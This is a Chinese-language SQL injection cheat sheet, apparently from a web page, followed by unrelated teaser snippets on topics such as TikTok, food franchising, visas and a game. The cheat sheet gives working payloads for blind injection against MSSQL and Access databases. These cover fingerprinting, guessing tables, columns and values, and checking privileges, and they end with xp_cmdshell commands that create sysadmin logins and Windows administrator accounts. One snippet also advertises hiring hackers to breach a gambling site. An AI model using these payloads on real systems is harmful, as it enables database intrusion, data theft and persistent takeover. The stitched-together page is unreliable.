1.判断是否有注入
;and 1=1
;and 1=2
2.初步判断是否是mssql
;and user>0
3.注入参数是字符
'and [查询条件] and ''='
4.搜索时没过滤参数的
'and [查询条件] and '%25'='
5.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
6.猜数据库
;and (Select Count(*) from [数据库名])>0
7.猜字段
;and (Select Count(字段名) from 数据库名)>0
8.猜字段中记录长度
;and (select top 1 len(字段名) from 数据库名)>0
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
10.测试权限结构(mssql)
;and 1=(Select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(Select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(Select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(Select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(Select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(Select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(Select IS_MEMBER('db_owner'));--
11.添加mssql和系统的帐户
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
编辑导语:前一阵,TikTok要被美国收购在网上闹得沸沸扬扬,不少网民对此发出了一些阻挡意见;可是实际上,TikTok作为中国产物出海,做到了让外国人成立起本身的平台,长短常不容易的;本文作者对此事举...
找黑客入侵大发888赌博网站相关问题 黑客入门基础知识手机相关问题 黑客要有什么条件 破解充值系统的黑客软件(超级黑客系统)...
麻辣烫行业作为美食行业发展的成熟品牌之一,行业品牌众多,口味参差不齐,价格也各不相同。对于麻辣烫加盟者来说菜品成本,人力成本相对来说也不算太高,而且消费人群比较广泛,能够很快赚回成本,所以从投资角度来...
宝典在此,请各位武林人士认真修炼。 好了回到主题,上一次给大家介绍了我们出国必备的东西,以及我们重要的签证,但是我们到底有哪些国家对我们实行免签或者电子签呢,今天我在这里给大家整理出来以及201...
在墨西哥莫雷利亚工作的建筑师选择用醒目的白色做大胆的添加。这是五个引人注目的项目,包括一棵被树木刺穿的房屋和一个食品市场。白色混凝土与黑色花岗岩形成鲜明对比,HW-Studio在这座房子中走下了斜坡。...
云顶之弈10.9版本上线后,玩家研究出了很多强势的阵容,那么这些阵容,玩家怎么选择呢?其实每个阵容都有自己的优点,玩家可以随即应变,这为大家分享一下海盗破法奥德赛阵容,那么海盗破法奥德赛阵容怎么玩?今...